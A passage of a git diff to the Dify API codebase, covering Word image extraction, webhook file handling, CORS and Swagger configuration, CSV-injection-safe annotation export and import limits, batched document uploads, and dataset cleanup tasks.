storage_type=dify_config.STORAGE_TYPE,
key=file_key,
name=file_key,
size=0,
extension=str(image_ext),
mime_type=mime_type or "",
created_by=self.user_id,
created_by_role=CreatorUserRole.ACCOUNT,
created_at=naive_utc_now(),
used=True,
used_by=self.user_id,
used_at=naive_utc_now(),
)
db.session.add(upload_file)
# Use r_id as key for external images since target_part is undefined
image_map[r_id] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)"
else:
image_ext = rel.target_ref.split(".")[-1]
if image_ext is None:
@ -110,27 +133,28 @@ class WordExtractor(BaseExtractor):
mime_type, _ = mimetypes.guess_type(file_key)
storage.save(file_key, rel.target_part.blob)
# save file to db
upload_file = UploadFile(
tenant_id=self.tenant_id,
storage_type=dify_config.STORAGE_TYPE,
key=file_key,
name=file_key,
size=0,
extension=str(image_ext),
mime_type=mime_type or "",
created_by=self.user_id,
created_by_role=CreatorUserRole.ACCOUNT,
created_at=naive_utc_now(),
used=True,
used_by=self.user_id,
used_at=naive_utc_now(),
)
db.session.add(upload_file)
db.session.commit()
image_map[rel.target_part] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)"
# save file to db
upload_file = UploadFile(
tenant_id=self.tenant_id,
storage_type=dify_config.STORAGE_TYPE,
key=file_key,
name=file_key,
size=0,
extension=str(image_ext),
mime_type=mime_type or "",
created_by=self.user_id,
created_by_role=CreatorUserRole.ACCOUNT,
created_at=naive_utc_now(),
used=True,
used_by=self.user_id,
used_at=naive_utc_now(),
)
db.session.add(upload_file)
# Use target_part as key for internal images
image_map[rel.target_part] = (
f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)"
)
db.session.commit()
return image_map
def _table_to_markdown(self, table, image_map):
@ -186,11 +210,17 @@ class WordExtractor(BaseExtractor):
image_id = blip.get("{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed")
if not image_id:
continue
image_part = paragraph.part.rels[image_id].target_part
if image_part in image_map:
image_link = image_map[image_part]
paragraph_content.append(image_link)
rel = paragraph.part.rels.get(image_id)
if rel is None:
continue
# For external images, use image_id as key; for internal, use target_part
if rel.is_external:
if image_id in image_map:
paragraph_content.append(image_map[image_id])
else:
image_part = rel.target_part
if image_part in image_map:
paragraph_content.append(image_map[image_part])
else:
paragraph_content.append(run.text)
return "".join(paragraph_content).strip()
@ -227,6 +257,18 @@ class WordExtractor(BaseExtractor):
def parse_paragraph(paragraph):
paragraph_content = []
def append_image_link(image_id, has_drawing):
"""Helper to append image link from image_map based on relationship type."""
rel = doc.part.rels[image_id]
if rel.is_external:
if image_id in image_map and not has_drawing:
paragraph_content.append(image_map[image_id])
else:
image_part = rel.target_part
if image_part in image_map and not has_drawing:
paragraph_content.append(image_map[image_part])
for run in paragraph.runs:
if hasattr(run.element, "tag") and isinstance(run.element.tag, str) and run.element.tag.endswith("r"):
# Process drawing type images
@ -243,10 +285,18 @@ class WordExtractor(BaseExtractor):
"{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed"
)
if embed_id:
image_part = doc.part.related_parts.get(embed_id)
if image_part in image_map:
has_drawing = True
paragraph_content.append(image_map[image_part])
rel = doc.part.rels.get(embed_id)
if rel is not None and rel.is_external:
# External image: use embed_id as key
if embed_id in image_map:
has_drawing = True
paragraph_content.append(image_map[embed_id])
else:
# Internal image: use target_part as key
image_part = doc.part.related_parts.get(embed_id)
if image_part in image_map:
has_drawing = True
paragraph_content.append(image_map[image_part])
# Process pict type images
shape_elements = run.element.findall(
".//{http://schemas.openxmlformats.org/wordprocessingml/2006/main}pict"
@ -261,9 +311,7 @@ class WordExtractor(BaseExtractor):
"{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id"
)
if image_id and image_id in doc.part.rels:
image_part = doc.part.rels[image_id].target_part
if image_part in image_map and not has_drawing:
paragraph_content.append(image_map[image_part])
append_image_link(image_id, has_drawing)
# Find imagedata element in VML
image_data = shape.find(".//{urn:schemas-microsoft-com:vml}imagedata")
if image_data is not None:
@ -271,9 +319,7 @@ class WordExtractor(BaseExtractor):
"{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id"
)
if image_id and image_id in doc.part.rels:
image_part = doc.part.rels[image_id].target_part
if image_part in image_map and not has_drawing:
paragraph_content.append(image_map[image_part])
append_image_link(image_id, has_drawing)
if run.text.strip():
paragraph_content.append(run.text.strip())
return "".join(paragraph_content) if paragraph_content else ""

View File

@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum):
notion_import = "notion"
local_file = "file_upload"
online_document = "online_document"
online_drive = "online_drive"

View File

@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError):
pass
class ToolSSRFError(ValueError):
pass
class ToolCredentialPolicyViolationError(ValueError):
pass

View File

@ -101,6 +101,8 @@ class ToolFileMessageTransformer:
meta = message.meta or {}
mimetype = meta.get("mime_type", "application/octet-stream")
if not mimetype:
mimetype = "application/octet-stream"
# get filename from meta
filename = meta.get("filename", None)
# if message is str, encode it to bytes

View File

@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser:
except ToolApiSchemaError as e:
openapi_error = e
# openai parse error, fallback to swagger
# openapi parse error, fallback to swagger
try:
converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi(
loaded_content, extra_info=extra_info, warning=warning
@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser:
), schema_type
except ToolApiSchemaError as e:
swagger_error = e
# swagger parse error, fallback to openai plugin
try:
openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle(

View File

@ -1,14 +1,22 @@
import logging
from collections.abc import Mapping
from typing import Any
from core.file import FileTransferMethod
from core.variables.types import SegmentType
from core.variables.variables import FileVariable
from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.enums import NodeExecutionType, NodeType
from core.workflow.node_events import NodeRunResult
from core.workflow.nodes.base.node import Node
from factories import file_factory
from factories.variable_factory import build_segment_with_type
from .entities import ContentType, WebhookData
logger = logging.getLogger(__name__)
class TriggerWebhookNode(Node[WebhookData]):
node_type = NodeType.TRIGGER_WEBHOOK
@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]):
outputs=outputs,
)
def generate_file_var(self, param_name: str, file: dict):
related_id = file.get("related_id")
transfer_method_value = file.get("transfer_method")
if transfer_method_value:
transfer_method = FileTransferMethod.value_of(transfer_method_value)
match transfer_method:
case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL:
file["upload_file_id"] = related_id
case FileTransferMethod.TOOL_FILE:
file["tool_file_id"] = related_id
case FileTransferMethod.DATASOURCE_FILE:
file["datasource_file_id"] = related_id
try:
file_obj = file_factory.build_from_mapping(
mapping=file,
tenant_id=self.tenant_id,
)
file_segment = build_segment_with_type(SegmentType.FILE, file_obj)
return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name])
except ValueError:
logger.error(
"Failed to build FileVariable for webhook file parameter %s",
param_name,
exc_info=True,
)
return None
def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]:
"""Extract outputs based on node configuration from webhook inputs."""
outputs = {}
@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]):
outputs[param_name] = str(webhook_data.get("body", {}).get("raw", ""))
continue
elif self.node_data.content_type == ContentType.BINARY:
outputs[param_name] = webhook_data.get("body", {}).get("raw", b"")
raw_data: dict = webhook_data.get("body", {}).get("raw", {})
file_var = self.generate_file_var(param_name, raw_data)
if file_var:
outputs[param_name] = file_var
else:
outputs[param_name] = raw_data
continue
if param_type == "file":
# Get File object (already processed by webhook controller)
file_obj = webhook_data.get("files", {}).get(param_name)
outputs[param_name] = file_obj
files = webhook_data.get("files", {})
if files and isinstance(files, dict):
file = files.get(param_name)
if file and isinstance(file, dict):
file_var = self.generate_file_var(param_name, file)
if file_var:
outputs[param_name] = file_var
else:
outputs[param_name] = files
else:
outputs[param_name] = files
else:
outputs[param_name] = files
else:
# Get regular body parameter
outputs[param_name] = webhook_data.get("body", {}).get(param_name)
# Include raw webhook data for debugging/advanced use
outputs["_webhook_raw"] = webhook_data
return outputs
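For orientation, generate_file_var expects each webhook file entry to be a mapping carrying at least related_id and transfer_method; the method copies related_id into whichever id field file_factory.build_from_mapping looks for. An illustrative call (the node variable and the field values are hypothetical, and the transfer_method string is assumed to match FileTransferMethod.LOCAL_FILE):

file_mapping = {
    "related_id": "upload-file-uuid",   # rewritten to upload_file_id for LOCAL_FILE / REMOTE_URL
    "transfer_method": "local_file",    # parsed via FileTransferMethod.value_of(...)
}
file_var = node.generate_file_var("attachment", file_mapping)
if file_var is None:
    # build_from_mapping raised ValueError, so the caller falls back to the raw dict
    pass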

View File

@ -15,4 +15,5 @@ def handle(sender: Dataset, **kwargs):
dataset.index_struct,
dataset.collection_binding_id,
dataset.doc_form,
dataset.pipeline_id,
)

View File

@ -9,11 +9,21 @@ FILES_HEADERS: tuple[str, ...] = (*BASE_CORS_HEADERS, HEADER_NAME_CSRF_TOKEN)
EXPOSED_HEADERS: tuple[str, ...] = ("X-Version", "X-Env", "X-Trace-Id")
def init_app(app: DifyApp):
# register blueprint routers
def _apply_cors_once(bp, /, **cors_kwargs):
"""Make CORS idempotent so blueprints can be reused across multiple app instances."""
if getattr(bp, "_dify_cors_applied", False):
return
from flask_cors import CORS
CORS(bp, **cors_kwargs)
bp._dify_cors_applied = True
def init_app(app: DifyApp):
# register blueprint routers
from controllers.console import bp as console_app_bp
from controllers.files import bp as files_bp
from controllers.inner_api import bp as inner_api_bp
@ -22,7 +32,7 @@ def init_app(app: DifyApp):
from controllers.trigger import bp as trigger_bp
from controllers.web import bp as web_bp
CORS(
_apply_cors_once(
service_api_bp,
allow_headers=list(SERVICE_API_HEADERS),
methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"],
@ -30,7 +40,7 @@ def init_app(app: DifyApp):
)
app.register_blueprint(service_api_bp)
CORS(
_apply_cors_once(
web_bp,
resources={r"/*": {"origins": dify_config.WEB_API_CORS_ALLOW_ORIGINS}},
supports_credentials=True,
@ -40,7 +50,7 @@ def init_app(app: DifyApp):
)
app.register_blueprint(web_bp)
CORS(
_apply_cors_once(
console_app_bp,
resources={r"/*": {"origins": dify_config.CONSOLE_CORS_ALLOW_ORIGINS}},
supports_credentials=True,
@ -50,7 +60,7 @@ def init_app(app: DifyApp):
)
app.register_blueprint(console_app_bp)
CORS(
_apply_cors_once(
files_bp,
allow_headers=list(FILES_HEADERS),
methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"],
@ -62,7 +72,7 @@ def init_app(app: DifyApp):
app.register_blueprint(mcp_bp)
# Register trigger blueprint with CORS for webhook calls
CORS(
_apply_cors_once(
trigger_bp,
allow_headers=["Content-Type", "Authorization", "X-App-Code"],
methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH", "HEAD"],

View File

@ -22,8 +22,8 @@ login_manager = flask_login.LoginManager()
@login_manager.request_loader
def load_user_from_request(request_from_flask_login):
"""Load user based on the request."""
# Skip authentication for documentation endpoints
if dify_config.SWAGGER_UI_ENABLED and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")):
# Skip authentication for documentation endpoints (only when Swagger is enabled)
if dify_config.swagger_ui_enabled and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")):
return None
auth_token = extract_access_token(request)

View File

@ -0,0 +1,7 @@
from core.db.session_factory import configure_session_factory
from extensions.ext_database import db
def init_app(app):
with app.app_context():
configure_session_factory(db.engine)
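The call runs inside app.app_context() because db.engine is only resolvable once an application context exists. configure_session_factory itself lives in core.db.session_factory and is not part of this diff; a plausible minimal shape, purely for orientation, is a shared sessionmaker that gets bound to the engine at startup:

# Hypothetical sketch of core/db/session_factory.py -- not shown in this diff
from sqlalchemy.engine import Engine
from sqlalchemy.orm import sessionmaker

_session_factory = sessionmaker(expire_on_commit=False)

def configure_session_factory(engine: Engine) -> None:
    # Bind the process-wide factory to the application's engine once it is available
    _session_factory.configure(bind=engine)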

View File

@ -1,3 +1,4 @@
import logging
import mimetypes
import os
import re
@ -17,6 +18,8 @@ from core.helper import ssrf_proxy
from extensions.ext_database import db
from models import MessageFile, ToolFile, UploadFile
logger = logging.getLogger(__name__)
def build_from_message_files(
*,
@ -356,15 +359,20 @@ def _build_from_tool_file(
transfer_method: FileTransferMethod,
strict_type_validation: bool = False,
) -> File:
    # Backward/interop compatibility: callers may populate tool_file_id from related_id or a URL
    # (e.g. TriggerWebhookNode.generate_file_var rewrites related_id into tool_file_id)
    tool_file_id = mapping.get("tool_file_id")
    if not tool_file_id:
        raise ValueError("tool_file_id is required to build a file from a tool file")
tool_file = db.session.scalar(
select(ToolFile).where(
ToolFile.id == mapping.get("tool_file_id"),
ToolFile.id == tool_file_id,
ToolFile.tenant_id == tenant_id,
)
)
if tool_file is None:
raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found")
raise ValueError(f"ToolFile {tool_file_id} not found")
extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin"
@ -402,10 +410,13 @@ def _build_from_datasource_file(
transfer_method: FileTransferMethod,
strict_type_validation: bool = False,
) -> File:
datasource_file_id = mapping.get("datasource_file_id")
if not datasource_file_id:
raise ValueError(f"DatasourceFile {datasource_file_id} not found")
datasource_file = (
db.session.query(UploadFile)
.where(
UploadFile.id == mapping.get("datasource_file_id"),
UploadFile.id == datasource_file_id,
UploadFile.tenant_id == tenant_id,
)
.first()

View File

@ -131,12 +131,28 @@ class ExternalApi(Api):
}
def __init__(self, app: Blueprint | Flask, *args, **kwargs):
import logging
import os
kwargs.setdefault("authorizations", self._authorizations)
kwargs.setdefault("security", "Bearer")
kwargs["add_specs"] = dify_config.SWAGGER_UI_ENABLED
kwargs["doc"] = dify_config.SWAGGER_UI_PATH if dify_config.SWAGGER_UI_ENABLED else False
# Security: Use computed swagger_ui_enabled which respects DEPLOY_ENV
swagger_enabled = dify_config.swagger_ui_enabled
kwargs["add_specs"] = swagger_enabled
kwargs["doc"] = dify_config.SWAGGER_UI_PATH if swagger_enabled else False
# manual separate call on construction and init_app to ensure configs in kwargs effective
super().__init__(app=None, *args, **kwargs)
self.init_app(app, **kwargs)
register_external_error_handlers(self)
# Security: Log warning when Swagger is enabled in production environment
deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION")
if swagger_enabled and deploy_env.upper() == "PRODUCTION":
logger = logging.getLogger(__name__)
logger.warning(
"SECURITY WARNING: Swagger UI is ENABLED in PRODUCTION environment. "
"This may expose sensitive API documentation. "
"Set SWAGGER_UI_ENABLED=false or remove the explicit setting to disable."
)

View File

@ -215,7 +215,11 @@ def generate_text_hash(text: str) -> str:
def compact_generate_response(response: Union[Mapping, Generator, RateLimitGenerator]) -> Response:
if isinstance(response, dict):
return Response(response=json.dumps(jsonable_encoder(response)), status=200, mimetype="application/json")
return Response(
response=json.dumps(jsonable_encoder(response)),
status=200,
content_type="application/json; charset=utf-8",
)
else:
def generate() -> Generator:

View File

@ -111,7 +111,11 @@ class App(Base):
else:
app_model_config = self.app_model_config
if app_model_config:
return app_model_config.pre_prompt
pre_prompt = app_model_config.pre_prompt or ""
# Truncate to 200 characters with ellipsis if using prompt as description
if len(pre_prompt) > 200:
return pre_prompt[:200] + "..."
return pre_prompt
else:
return ""

View File

@ -1,6 +1,6 @@
[project]
name = "dify-api"
version = "1.11.0"
version = "1.11.1"
requires-python = ">=3.11,<3.13"
dependencies = [
@ -216,6 +216,7 @@ vdb = [
"pymochow==2.2.9",
"pyobvector~=0.2.17",
"qdrant-client==1.9.0",
"intersystems-irispython>=5.1.0",
"tablestore==6.3.7",
"tcvectordb~=1.6.4",
"tidb-vector==0.0.9",

View File

@ -1,5 +1,5 @@
[pytest]
addopts = --cov=./api --cov-report=json --cov-report=xml
addopts = --cov=./api --cov-report=json
env =
ANTHROPIC_API_KEY = sk-ant-api11-IamNotARealKeyJustForMockTestKawaiiiiiiiiii-NotBaka-ASkksz
AZURE_OPENAI_API_BASE = https://difyai-openai.openai.azure.com

View File

@ -1,10 +1,14 @@
import logging
import uuid
import pandas as pd
logger = logging.getLogger(__name__)
from sqlalchemy import or_, select
from werkzeug.datastructures import FileStorage
from werkzeug.exceptions import NotFound
from core.helper.csv_sanitizer import CSVSanitizer
from extensions.ext_database import db
from extensions.ext_redis import redis_client
from libs.datetime_utils import naive_utc_now
@ -155,6 +159,12 @@ class AppAnnotationService:
@classmethod
def export_annotation_list_by_app_id(cls, app_id: str):
"""
Export all annotations for an app with CSV injection protection.
Sanitizes question and content fields to prevent formula injection attacks
when exported to CSV format.
"""
# get app info
_, current_tenant_id = current_account_with_tenant()
app = (
@ -171,6 +181,16 @@ class AppAnnotationService:
.order_by(MessageAnnotation.created_at.desc())
.all()
)
# Sanitize CSV-injectable fields to prevent formula injection
for annotation in annotations:
# Sanitize question field if present
if annotation.question:
annotation.question = CSVSanitizer.sanitize_value(annotation.question)
# Sanitize content field (answer)
if annotation.content:
annotation.content = CSVSanitizer.sanitize_value(annotation.content)
return annotations
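CSVSanitizer.sanitize_value comes from core.helper.csv_sanitizer and its body is not part of this diff. The standard mitigation it presumably applies is to neutralize cells that spreadsheet software would evaluate as formulas; a hedged sketch of that technique (not the project's actual implementation):

FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

def sanitize_value(value: str) -> str:
    # Prefixing with a single quote stops Excel/Google Sheets from treating the cell as a formula
    if value and value.startswith(FORMULA_PREFIXES):
        return "'" + value
    return value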
@classmethod
@ -330,6 +350,18 @@ class AppAnnotationService:
@classmethod
def batch_import_app_annotations(cls, app_id, file: FileStorage):
"""
Batch import annotations from CSV file with enhanced security checks.
Security features:
- File size validation
- Row count limits (min/max)
- Memory-efficient CSV parsing
- Subscription quota validation
- Concurrency tracking
"""
from configs import dify_config
# get app info
current_user, current_tenant_id = current_account_with_tenant()
app = (
@ -341,16 +373,80 @@ class AppAnnotationService:
if not app:
raise NotFound("App not found")
job_id: str | None = None # Initialize to avoid unbound variable error
try:
# Skip the first row
df = pd.read_csv(file.stream, dtype=str)
result = []
for _, row in df.iterrows():
content = {"question": row.iloc[0], "answer": row.iloc[1]}
# Quick row count check before full parsing (memory efficient)
# Read only first chunk to estimate row count
file.stream.seek(0)
first_chunk = file.stream.read(8192) # Read first 8KB
file.stream.seek(0)
# Estimate row count from first chunk
newline_count = first_chunk.count(b"\n")
if newline_count == 0:
raise ValueError("The CSV file appears to be empty or invalid.")
# Parse CSV with row limit to prevent memory exhaustion
            # Cap the number of rows read (nrows) so oversized files are rejected without full parsing
max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS
min_records = dify_config.ANNOTATION_IMPORT_MIN_RECORDS
            # Read the CSV with an explicit row limit to avoid loading an unbounded file into memory
df = pd.read_csv(
file.stream,
dtype=str,
nrows=max_records + 1, # Read one extra to detect overflow
engine="python",
on_bad_lines="skip", # Skip malformed lines instead of crashing
)
# Validate column count
if len(df.columns) < 2:
raise ValueError("Invalid CSV format. The file must contain at least 2 columns (question and answer).")
# Build result list with validation
result: list[dict] = []
for idx, row in df.iterrows():
# Stop if we exceed the limit
if len(result) >= max_records:
raise ValueError(
f"The CSV file contains too many records. Maximum {max_records} records allowed per import. "
f"Please split your file into smaller batches."
)
# Extract and validate question and answer
try:
question_raw = row.iloc[0]
answer_raw = row.iloc[1]
except (IndexError, KeyError):
continue # Skip malformed rows
# Convert to string and strip whitespace
question = str(question_raw).strip() if question_raw is not None else ""
answer = str(answer_raw).strip() if answer_raw is not None else ""
# Skip empty entries or NaN values
if not question or not answer or question.lower() == "nan" or answer.lower() == "nan":
continue
# Validate length constraints (idx is pandas index, convert to int for display)
row_num = int(idx) + 2 if isinstance(idx, (int, float)) else len(result) + 2
if len(question) > 2000:
raise ValueError(f"Question at row {row_num} is too long. Maximum 2000 characters allowed.")
if len(answer) > 10000:
raise ValueError(f"Answer at row {row_num} is too long. Maximum 10000 characters allowed.")
content = {"question": question, "answer": answer}
result.append(content)
if len(result) == 0:
raise ValueError("The CSV file is empty.")
# check annotation limit
# Validate minimum records
if len(result) < min_records:
raise ValueError(
f"The CSV file must contain at least {min_records} valid annotation record(s). "
f"Found {len(result)} valid record(s)."
)
# Check annotation quota limit
features = FeatureService.get_features(current_tenant_id)
if features.billing.enabled:
annotation_quota_limit = features.annotation_quota_limit
@ -359,12 +455,34 @@ class AppAnnotationService:
# async job
job_id = str(uuid.uuid4())
indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}"
# send batch add segments task
# Register job in active tasks list for concurrency tracking
current_time = int(naive_utc_now().timestamp() * 1000)
active_jobs_key = f"annotation_import_active:{current_tenant_id}"
redis_client.zadd(active_jobs_key, {job_id: current_time})
redis_client.expire(active_jobs_key, 7200) # 2 hours TTL
# Set job status
redis_client.setnx(indexing_cache_key, "waiting")
batch_import_annotations_task.delay(str(job_id), result, app_id, current_tenant_id, current_user.id)
except Exception as e:
except ValueError as e:
return {"error_msg": str(e)}
return {"job_id": job_id, "job_status": "waiting"}
except Exception as e:
# Clean up active job registration on error (only if job was created)
if job_id is not None:
try:
active_jobs_key = f"annotation_import_active:{current_tenant_id}"
redis_client.zrem(active_jobs_key, job_id)
except Exception:
# Silently ignore cleanup errors - the job will be auto-expired
logger.debug("Failed to clean up active job tracking during error handling")
# Check if it's a CSV parsing error
error_str = str(e)
return {"error_msg": f"An error occurred while processing the file: {error_str}"}
return {"job_id": job_id, "job_status": "waiting", "record_count": len(result)}
@classmethod
def get_annotation_hit_histories(cls, app_id: str, annotation_id: str, page, limit):
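The zadd/expire registration above, together with the matching zrem in batch_import_annotations_task later in this commit, keeps a per-tenant sorted set of in-flight import jobs. Where that set is read to enforce a limit is not shown in this diff; a plausible cap check, stated purely as an assumption, would count recent members before accepting a new import:

def has_import_capacity(tenant_id: str, max_concurrent: int = 3) -> bool:
    # Hypothetical helper built on the active-jobs sorted set; max_concurrent is an assumed knob
    active_jobs_key = f"annotation_import_active:{tenant_id}"
    cutoff = int(naive_utc_now().timestamp() * 1000) - 2 * 60 * 60 * 1000  # ignore entries past the 2h TTL
    redis_client.zremrangebyscore(active_jobs_key, "-inf", cutoff)  # drop stale registrations
    return redis_client.zcard(active_jobs_key) < max_concurrent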

View File

@ -118,7 +118,7 @@ class ConversationService:
app_model: App,
conversation_id: str,
user: Union[Account, EndUser] | None,
name: str,
name: str | None,
auto_generate: bool,
):
conversation = cls.get_conversation(app_model, conversation_id, user)

View File

@ -1419,7 +1419,7 @@ class DocumentService:
document.name = name
db.session.add(document)
if document.data_source_info_dict:
if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict:
db.session.query(UploadFile).where(
UploadFile.id == document.data_source_info_dict["upload_file_id"]
).update({UploadFile.name: name})
@ -1636,6 +1636,20 @@ class DocumentService:
return [], ""
db.session.add(dataset_process_rule)
db.session.flush()
else:
# Fallback when no process_rule provided in knowledge_config:
# 1) reuse dataset.latest_process_rule if present
# 2) otherwise create an automatic rule
dataset_process_rule = getattr(dataset, "latest_process_rule", None)
if not dataset_process_rule:
dataset_process_rule = DatasetProcessRule(
dataset_id=dataset.id,
mode="automatic",
rules=json.dumps(DatasetProcessRule.AUTOMATIC_RULES),
created_by=account.id,
)
db.session.add(dataset_process_rule)
db.session.flush()
lock_name = f"add_document_lock_dataset_id_{dataset.id}"
try:
with redis_client.lock(lock_name, timeout=600):
@ -1647,65 +1661,67 @@ class DocumentService:
if not knowledge_config.data_source.info_list.file_info_list:
raise ValueError("File source info is required")
upload_file_list = knowledge_config.data_source.info_list.file_info_list.file_ids
for file_id in upload_file_list:
file = (
db.session.query(UploadFile)
.where(UploadFile.tenant_id == dataset.tenant_id, UploadFile.id == file_id)
.first()
files = (
db.session.query(UploadFile)
.where(
UploadFile.tenant_id == dataset.tenant_id,
UploadFile.id.in_(upload_file_list),
)
.all()
)
if len(files) != len(set(upload_file_list)):
raise FileNotExistsError("One or more files not found.")
# raise error if file not found
if not file:
raise FileNotExistsError()
file_name = file.name
file_names = [file.name for file in files]
db_documents = (
db.session.query(Document)
.where(
Document.dataset_id == dataset.id,
Document.tenant_id == current_user.current_tenant_id,
Document.data_source_type == "upload_file",
Document.enabled == True,
Document.name.in_(file_names),
)
.all()
)
documents_map = {document.name: document for document in db_documents}
for file in files:
data_source_info: dict[str, str | bool] = {
"upload_file_id": file_id,
"upload_file_id": file.id,
}
# check duplicate
if knowledge_config.duplicate:
document = (
db.session.query(Document)
.filter_by(
dataset_id=dataset.id,
tenant_id=current_user.current_tenant_id,
data_source_type="upload_file",
enabled=True,
name=file_name,
)
.first()
document = documents_map.get(file.name)
if knowledge_config.duplicate and document:
document.dataset_process_rule_id = dataset_process_rule.id
document.updated_at = naive_utc_now()
document.created_from = created_from
document.doc_form = knowledge_config.doc_form
document.doc_language = knowledge_config.doc_language
document.data_source_info = json.dumps(data_source_info)
document.batch = batch
document.indexing_status = "waiting"
db.session.add(document)
documents.append(document)
duplicate_document_ids.append(document.id)
continue
else:
document = DocumentService.build_document(
dataset,
dataset_process_rule.id,
knowledge_config.data_source.info_list.data_source_type,
knowledge_config.doc_form,
knowledge_config.doc_language,
data_source_info,
created_from,
position,
account,
file.name,
batch,
)
if document:
document.dataset_process_rule_id = dataset_process_rule.id
document.updated_at = naive_utc_now()
document.created_from = created_from
document.doc_form = knowledge_config.doc_form
document.doc_language = knowledge_config.doc_language
document.data_source_info = json.dumps(data_source_info)
document.batch = batch
document.indexing_status = "waiting"
db.session.add(document)
documents.append(document)
duplicate_document_ids.append(document.id)
continue
document = DocumentService.build_document(
dataset,
dataset_process_rule.id,
knowledge_config.data_source.info_list.data_source_type,
knowledge_config.doc_form,
knowledge_config.doc_language,
data_source_info,
created_from,
position,
account,
file_name,
batch,
)
db.session.add(document)
db.session.flush()
document_ids.append(document.id)
documents.append(document)
position += 1
db.session.add(document)
db.session.flush()
document_ids.append(document.id)
documents.append(document)
position += 1
elif knowledge_config.data_source.info_list.data_source_type == "notion_import":
notion_info_list = knowledge_config.data_source.info_list.notion_info_list # type: ignore
if not notion_info_list:
@ -2801,20 +2817,20 @@ class SegmentService:
db.session.add(binding)
db.session.commit()
# save vector index
try:
VectorService.create_segments_vector(
[args["keywords"]], [segment_document], dataset, document.doc_form
)
except Exception as e:
logger.exception("create segment index failed")
segment_document.enabled = False
segment_document.disabled_at = naive_utc_now()
segment_document.status = "error"
segment_document.error = str(e)
db.session.commit()
segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first()
return segment
# save vector index
try:
keywords = args.get("keywords")
keywords_list = [keywords] if keywords is not None else None
VectorService.create_segments_vector(keywords_list, [segment_document], dataset, document.doc_form)
except Exception as e:
logger.exception("create segment index failed")
segment_document.enabled = False
segment_document.disabled_at = naive_utc_now()
segment_document.status = "error"
segment_document.error = str(e)
db.session.commit()
segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first()
return segment
except LockNotOwnedError:
pass

View File

@ -178,8 +178,8 @@ class HitTestingService:
@classmethod
def hit_testing_args_check(cls, args):
query = args["query"]
attachment_ids = args["attachment_ids"]
query = args.get("query")
attachment_ids = args.get("attachment_ids")
if not attachment_ids and not query:
raise ValueError("Query or attachment_ids is required")

View File

@ -30,6 +30,8 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id:
logger.info(click.style(f"Start batch import annotation: {job_id}", fg="green"))
start_at = time.perf_counter()
indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}"
active_jobs_key = f"annotation_import_active:{tenant_id}"
# get app info
app = db.session.query(App).where(App.id == app_id, App.tenant_id == tenant_id, App.status == "normal").first()
@ -91,4 +93,13 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id:
redis_client.setex(indexing_error_msg_key, 600, str(e))
logger.exception("Build index for batch import annotations failed")
finally:
# Clean up active job tracking to release concurrency slot
try:
redis_client.zrem(active_jobs_key, job_id)
logger.debug("Released concurrency slot for job: %s", job_id)
except Exception as cleanup_error:
# Log but don't fail if cleanup fails - the job will be auto-expired
logger.warning("Failed to clean up active job tracking for %s: %s", job_id, cleanup_error)
# Close database session
db.session.close()

View File

@ -9,6 +9,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto
from core.tools.utils.web_reader_tool import get_image_upload_file_ids
from extensions.ext_database import db
from extensions.ext_storage import storage
from models import WorkflowType
from models.dataset import (
AppDatasetJoin,
Dataset,
@ -18,9 +19,11 @@ from models.dataset import (
DatasetQuery,
Document,
DocumentSegment,
Pipeline,
SegmentAttachmentBinding,
)
from models.model import UploadFile
from models.workflow import Workflow
logger = logging.getLogger(__name__)
@ -34,6 +37,7 @@ def clean_dataset_task(
index_struct: str,
collection_binding_id: str,
doc_form: str,
pipeline_id: str | None = None,
):
"""
    Clean up dataset resources when a dataset is deleted.
@ -135,6 +139,14 @@ def clean_dataset_task(
# delete dataset metadata
db.session.query(DatasetMetadata).where(DatasetMetadata.dataset_id == dataset_id).delete()
db.session.query(DatasetMetadataBinding).where(DatasetMetadataBinding.dataset_id == dataset_id).delete()
# delete pipeline and workflow
if pipeline_id:
db.session.query(Pipeline).where(Pipeline.id == pipeline_id).delete()
db.session.query(Workflow).where(
Workflow.tenant_id == tenant_id,
Workflow.app_id == pipeline_id,
Workflow.type == WorkflowType.RAG_PIPELINE,
).delete()
# delete files
if documents:
for document in documents:

View File

@ -2,6 +2,7 @@ import logging
from celery import shared_task
from configs import dify_config
from extensions.ext_database import db
from models import Account
from services.billing_service import BillingService
@ -14,7 +15,8 @@ logger = logging.getLogger(__name__)
def delete_account_task(account_id):
account = db.session.query(Account).where(Account.id == account_id).first()
try:
